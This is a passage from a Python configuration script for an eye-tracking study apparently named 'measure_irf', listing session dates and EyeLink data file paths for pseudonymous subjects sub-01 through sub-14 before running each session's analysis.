'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'IRF_sub-01_s1_r1_b1_2015-11-09_13-01-09.edf' ),
},
]
if s == 2:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 2,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session2, 'eye', 'IRF_sub-01_s2_r1_b1_2015-11-16_15-18-57.edf' ),
},
]
if s == 3:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 3,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session3, 'eye', 'IRF_sub-01_s3_r1_b1_2015-11-27_13-41-58.edf' ),
},
]
if s == 4:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 4,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session4, 'eye', 'IRF_sub-01_s4_r1_b1_2015-12-04_13-21-02.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
########################################################################################################################################################################################################
if which_subject == 'sub-02':
# subject information
initials = 'sub-02'
firstName = 'sub-02'
standardFSID = 'sub-02_110412'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'measure_irf', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'measure_irf' + presentSubject.initials
if s == 1:
sessionDate = datetime.date(2015, 9, 28)
sj_session1 = 'sub-02_280915'
if s == 2:
sessionDate = datetime.date(2015, 10, 28)
sj_session2 = 'sub-02_281015'
if s == 3:
sessionDate = datetime.date(2015, 11, 3)
sj_session3 = 'sub-02_031115'
if s == 4:
sessionDate = datetime.date(2015, 11, 10)
sj_session4 = 'sub-02_101115'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
if s == 1:
runDecisionArray = [
# Measure IRF:
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'IRF_sub-02_b1_s1_r1_2015-09-28_16-17-09.edf' ),
},
]
if s == 2:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 2,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session2, 'eye', 'IRF_sub-02_s2_r1_b1_2015-10-28_16-22-03.edf' ),
},
]
if s == 3:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 3,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session3, 'eye', 'IRF_sub-02_s3_r2_b1_2015-11-03_17-42-20.edf' ),
},
]
# if s == 4: # gets error on import_all_data
# runDecisionArray = [
# {'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 4,
# 'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session4, 'eye', 'IRF_sub-02_s4_r1_b1_2015-11-10_16-18-50.edf' ),
# },
# ]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
########################################################################################################################################################################################################
if which_subject == 'sub-03':
# subject information
initials = 'sub-03'
firstName = 'sub-03'
standardFSID = 'sub-03_190414'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'measure_irf', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'measure_irf' + presentSubject.initials
if s == 1:
sessionDate = datetime.date(2015, 9, 25)
sj_session1 = 'sub-03_250915'
if s == 2:
sessionDate = datetime.date(2015, 11, 3)
sj_session2 = 'sub-03_031115'
if s == 3:
sessionDate = datetime.date(2015, 11, 10)
sj_session3 = 'sub-03_101115'
if s == 4:
sessionDate = datetime.date(2015, 11, 17)
sj_session4 = 'sub-03_171115'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
if s == 1:
runDecisionArray = [
# Measure IRF:
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'IRF_sub-03_b1_s1_r1_2015-09-25_14-14-04.edf' ),
},
]
if s == 2:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 2,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session2, 'eye', 'IRF_sub-03_s2_r1_b1_2015-11-03_18-19-24.edf' ),
},
]
if s == 3:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 3,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session3, 'eye', 'IRF_sub-03_s3_r1_b1_2015-11-10_18-12-32.edf' ),
},
]
if s == 4:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 4,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session4, 'eye', 'IRF_sub-03_s4_r1_b1_2015-11-17_16-08-55.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
########################################################################################################################################################################################################
if which_subject == 'sub-04':
# subject information
initials = 'sub-04'
firstName = 'sub-04'
standardFSID = 'sub-04_140316'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'measure_irf', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'measure_irf' + presentSubject.initials
if s == 1:
sessionDate = datetime.date(2015, 9, 25)
sj_session1 = 'sub-04_250915'
if s == 2:
sessionDate = datetime.date(2015, 11, 12)
sj_session2 = 'sub-04_121115'
if s == 3:
sessionDate = datetime.date(2015, 11, 20)
sj_session3 = 'sub-04_201115'
if s == 4:
sessionDate = datetime.date(2015, 12, 01)
sj_session4 = 'sub-04_011215'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
if s == 1:
runDecisionArray = [
# Measure IRF:
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'IRF_sub-04_b1_s1_r1_2015-09-25_12-34-35.edf' ),
},
]
if s == 2:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 2,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session2, 'eye', 'IRF_sub-04_s2_r1_b1_2015-11-12_10-05-17.edf' ),
},
]
if s == 3:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 3,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session3, 'eye', 'IRF_sub-04_s3_r1_b1_2015-11-20_11-52-27.edf' ),
},
]
if s == 4:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 4,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session4, 'eye', 'IRF_sub-04_s4_r1_b1_2015-12-01_11-56-41.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
########################################################################################################################################################################################################
if which_subject == 'sub-05':
# subject information
initials = 'sub-05'
firstName = 'sub-05'
standardFSID = 'sub-05_310312'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'measure_irf', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'measure_irf' + presentSubject.initials
if s == 1:
sessionDate = datetime.date(2015, 11, 9)
sj_session1 = 'sub-05_091115'
if s == 2:
sessionDate = datetime.date(2015, 11, 16)
sj_session2 = 'sub-05_161115'
if s == 3:
sessionDate = datetime.date(2015, 11, 23)
sj_session3 = 'sub-05_231115'
if s == 4:
sessionDate = datetime.date(2015, 12, 03)
sj_session4 = 'sub-05_031215'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
if s == 1:
runDecisionArray = [
# Measure IRF:
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'IRF_sub-05_s1_r1_b1_2015-11-09_15-26-50.edf' ),
},
]
if s == 2:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 2,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session2, 'eye', 'IRF_sub-05_s2_r1_b1_2015-11-16_11-49-23.edf' ),
},
]
if s == 3:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 3,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session3, 'eye', 'IRF_sub-05_s3_r1_b1_2015-11-23_11-57-28.edf' ),
},
]
if s == 4:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 4,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session4, 'eye', 'IRF_sub-05_s4_r1_b1_2015-12-03_11-28-40.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
########################################################################################################################################################################################################
if which_subject == 'sub-06':
# subject information
initials = 'sub-06'
firstName = 'sub-06'
standardFSID = 'sub-06_250514'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'measure_irf', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'measure_irf' + presentSubject.initials
if s == 1:
sessionDate = datetime.date(2015, 11, 13)
sj_session1 = 'sub-06_131115'
if s == 2:
sessionDate = datetime.date(2015, 11, 21)
sj_session2 = 'sub-06_211115'
if s == 3:
sessionDate = datetime.date(2015, 11, 26)
sj_session3 = 'sub-06_261115'
if s == 4:
sessionDate = datetime.date(2015, 12, 01)
sj_session4 = 'sub-06_011215'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
if s == 1:
runDecisionArray = [
# Measure IRF:
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'IRF_sub-06_s1_r1_b1_2015-11-13_14-02-26.edf' ),
},
]
if s == 2:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 2,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session2, 'eye', 'IRF_sub-06_s2_r1_b1_2015-11-21_10-16-21.edf' ),
},
]
if s == 3:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 3,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session3, 'eye', 'IRF_sub-06_s3_r1_b1_2015-11-26_19-20-42.edf' ),
},
]
if s == 4:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 4,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session4, 'eye', 'IRF_sub-06_s4_r1_b1_2015-12-01_18-55-04.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
########################################################################################################################################################################################################
if which_subject == 'sub-07':
# subject information
initials = 'sub-07'
firstName = 'sub-07'
standardFSID = 'sub-07_190414'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'measure_irf', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'measure_irf' + presentSubject.initials
if s == 1:
sessionDate = datetime.date(2015, 11, 4)
sj_session1 = 'sub-07_041115'
if s == 2:
sessionDate = datetime.date(2015, 11, 12)
sj_session2 = 'sub-07_121115'
if s == 3:
sessionDate = datetime.date(2015, 11, 17)
sj_session3 = 'sub-07_171115'
if s == 4:
sessionDate = datetime.date(2015, 11, 26)
sj_session4 = 'sub-07_261115'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
if s == 1:
runDecisionArray = [
# Measure IRF:
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'IRF_sub-07_s1_r1_b1_2015-11-04_18-31-23.edf' ),
},
]
if s == 2:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 2,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session2, 'eye', 'IRF_sub-07_s2_r1_b1_2015-11-12_14-22-46.edf' ),
},
]
if s == 3:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 3,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session3, 'eye', 'IRF_sub-07_s3_r1_b1_2015-11-17_14-20-37.edf' ),
},
]
if s == 4:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 4,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session4, 'eye', 'IRF_sub-07_s4_r1_b1_2015-11-26_09-25-25.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
########################################################################################################################################################################################################
if which_subject == 'sub-08':
# subject information
initials = 'sub-08'
firstName = 'sub-08'
standardFSID = 'sub-08_030215'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'measure_irf', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'measure_irf' + presentSubject.initials
if s == 1:
sessionDate = datetime.date(2015, 12, 17)
sj_session1 = 'sub-08_171215'
if s == 2:
sessionDate = datetime.date(2016, 01, 11)
sj_session2 = 'sub-08_110116'
if s == 3:
sessionDate = datetime.date(2016, 01, 19)
sj_session3 = 'sub-08_190116'
if s == 4:
sessionDate = datetime.date(2016, 01, 29)
sj_session4 = 'sub-08_290116'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
if s == 1:
runDecisionArray = [
# Measure IRF:
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'IRF_sub-08_s1_r1_b1_2015-12-17_09-23-37.edf' ),
},
]
if s == 2:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 2,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session2, 'eye', 'IRF_sub-08_s2_r1_b1_2016-01-11_16-15-13.edf' ),
},
]
if s == 3:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 3,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session3, 'eye', 'IRF_sub-08_s3_r1_b1_2016-01-19_16-13-03.edf' ),
},
]
if s == 4:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 4,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session4, 'eye', 'IRF_sub-08_s4_r1_b1_2016-01-29_11-30-10.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
########################################################################################################################################################################################################
if which_subject == 'sub-09':
# subject information
initials = 'sub-09'
firstName = 'sub-09'
standardFSID = 'sub-09_250711'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'measure_irf', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'measure_irf' + presentSubject.initials
if s == 1:
sessionDate = datetime.date(2015, 11, 18)
sj_session1 = 'sub-09_181115'
if s == 2:
sessionDate = datetime.date(2015, 11, 26)
sj_session2 = 'sub-09_261115'
if s == 3:
sessionDate = datetime.date(2015, 12, 10)
sj_session3 = 'sub-09_101215'
if s == 4:
sessionDate = datetime.date(2016, 01, 28)
sj_session4 = 'sub-09_280116'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
if s == 1:
runDecisionArray = [
# Measure IRF:
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'IRF_sub-09_s1_r1_b1_2015-11-18_16-02-37.edf' ),
},
]
if s == 2:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 2,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session2, 'eye', 'IRF_sub-09_s2_r1_b1_2015-11-26_16-29-34.edf' ),
},
]
if s == 3:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 3,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session3, 'eye', 'IRF_sub-09_s3_r2_b1_2015-12-10_20-18-28.edf' ),
},
]
if s == 4:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 4,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session4, 'eye', 'IRF_sub-09_s4_r1_b1_2016-01-28_14-59-48.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
########################################################################################################################################################################################################
if which_subject == 'sub-10':
# subject information
initials = 'sub-10'
firstName = 'sub-10'
standardFSID = 'sub-10_140316'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'measure_irf', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'measure_irf' + presentSubject.initials
if s == 1:
sessionDate = datetime.date(2015, 11, 11)
sj_session1 = 'sub-10_111115'
if s == 2:
sessionDate = datetime.date(2015, 11, 18)
sj_session2 = 'sub-10_181115'
if s == 3:
sessionDate = datetime.date(2015, 12, 02)
sj_session3 = 'sub-10_021215'
if s == 4:
sessionDate = datetime.date(2015, 12, 07)
sj_session4 = 'sub-10_071215'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
if s == 1:
runDecisionArray = [
# Measure IRF:
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'IRF_sub-10_s1_r1_b1_2015-11-11_12-02-48.edf' ),
},
]
if s == 2:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 2,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session2, 'eye', 'IRF_sub-10_s2_r1_b1_2015-11-18_11-58-37.edf' ),
},
]
if s == 3:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 3,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session3, 'eye', 'IRF_sub-10_s3_r1_b1_2015-12-02_16-25-52.edf' ),
},
]
if s == 4:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 4,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session4, 'eye', 'IRF_sub-10_s4_r1_b1_2015-12-07_13-25-20.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
########################################################################################################################################################################################################
if which_subject == 'sub-11':
# subject information
initials = 'sub-11'
firstName = 'sub-11'
standardFSID = 'sub-11_140316'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'measure_irf', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'measure_irf' + presentSubject.initials
if s == 1:
sessionDate = datetime.date(2015, 12, 06)
sj_session1 = 'sub-11_061215'
if s == 2:
sessionDate = datetime.date(2016, 01, 13)
sj_session2 = 'sub-11_130116'
if s == 3:
sessionDate = datetime.date(2016, 01, 20)
sj_session3 = 'sub-11_200116'
if s == 4:
sessionDate = datetime.date(2016, 01, 27)
sj_session4 = 'sub-11_270116'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
if s == 1:
runDecisionArray = [
# Measure IRF:
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'IRF_sub-11_s1_r1_b1_2015-12-06_10-41-43.edf' ),
},
]
if s == 2:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 2,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session2, 'eye', 'IRF_sub-11_s2_r1_b1_2016-01-13_12-29-04.edf' ),
},
]
if s == 3:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 3,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session3, 'eye', 'IRF_sub-11_s3_r1_b1_2016-01-20_12-03-29.edf' ),
},
]
if s == 4:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 4,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session4, 'eye', 'IRF_sub-11_s4_r1_b1_2016-01-27_11-48-32.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
########################################################################################################################################################################################################
if which_subject == 'sub-12':
# subject information
initials = 'sub-12'
firstName = 'sub-12'
standardFSID = 'sub-12_091009tk'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'measure_irf', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'measure_irf' + presentSubject.initials
if s == 1:
sessionDate = datetime.date(2015, 11, 11)
sj_session1 = 'sub-12_111115'
if s == 2:
sessionDate = datetime.date(2015, 11, 25)
sj_session2 = 'sub-12_251115'
if s == 3:
sessionDate = datetime.date(2015, 12, 02)
sj_session3 = 'sub-12_021215'
if s == 4:
sessionDate = datetime.date(2015, 12, 15)
sj_session4 = 'sub-12_151215'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
if s == 1:
runDecisionArray = [
# Measure IRF:
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'IRF_sub-12_s1_r0_b1_2015-11-11_15-30-12.edf' ),
},
]
if s == 2:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 2,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session2, 'eye', 'IRF_sub-12_s2_r1_b1_2015-11-25_17-15-23.edf' ),
},
]
if s == 3:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 3,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session3, 'eye', 'IRF_sub-12_s3_r1_b1_2015-12-02_11-48-04.edf' ),
},
]
if s == 4:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 4,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session4, 'eye', 'IRF_sub-12_s4_r1_b1_2015-12-15_16-19-56.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
########################################################################################################################################################################################################
if which_subject == 'sub-13':
# subject information
initials = 'sub-13'
firstName = 'sub-13'
standardFSID = 'sub-13_140316'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'measure_irf', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'measure_irf' + presentSubject.initials
if s == 1:
sessionDate = datetime.date(2015, 12, 04)
sj_session1 = 'sub-13_041215'
if s == 2:
sessionDate = datetime.date(2015, 12, 11)
sj_session2 = 'sub-13_111215'
if s == 3:
sessionDate = datetime.date(2016, 01, 8)
sj_session3 = 'sub-13_080116'
if s == 4:
sessionDate = datetime.date(2016, 01, 18)
sj_session4 = 'sub-13_180116'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
if s == 1:
runDecisionArray = [
# Measure IRF:
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'IRF_sub-13_s1_r1_b1_2015-12-04_15-19-42.edf' ),
},
]
if s == 2:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 2,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session2, 'eye', 'IRF_sub-13_s2_r1_b1_2015-12-11_15-48-27.edf' ),
},
]
if s == 3:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 3,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session3, 'eye', 'IRF_sub-13_s3_r1_b1_2016-01-08_16-17-41.edf' ),
},
]
if s == 4:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 4,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session4, 'eye', 'IRF_sub-13_s4_r1_b1_2016-01-18_15-05-41.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
########################################################################################################################################################################################################
if which_subject == 'sub-14':
# subject information
initials = 'sub-14'
firstName = 'sub-14'
standardFSID = 'sub-14_081014'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'measure_irf', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'measure_irf' + presentSubject.initials
if s == 1:
sessionDate = datetime.date(2015, 10, 01)
sj_session1 = 'sub-14_011015'
if s == 2:
sessionDate = datetime.date(2015, 11, 04)
sj_session2 = 'sub-14_041115'
if s == 3:
sessionDate = datetime.date(2015, 11, 12)
sj_session3 = 'sub-14_121115'
if s == 4:
sessionDate = datetime.date(2015, 11, 20)
sj_session4 = 'sub-14_201115'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
# No session 1
if s == 2:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 2,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session2, 'eye', 'IRF_sub-14_s2_r1_b1_2015-11-04_16-28-33.edf' ),
},
]
if s == 3:
runDecisionArray = [
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 3,
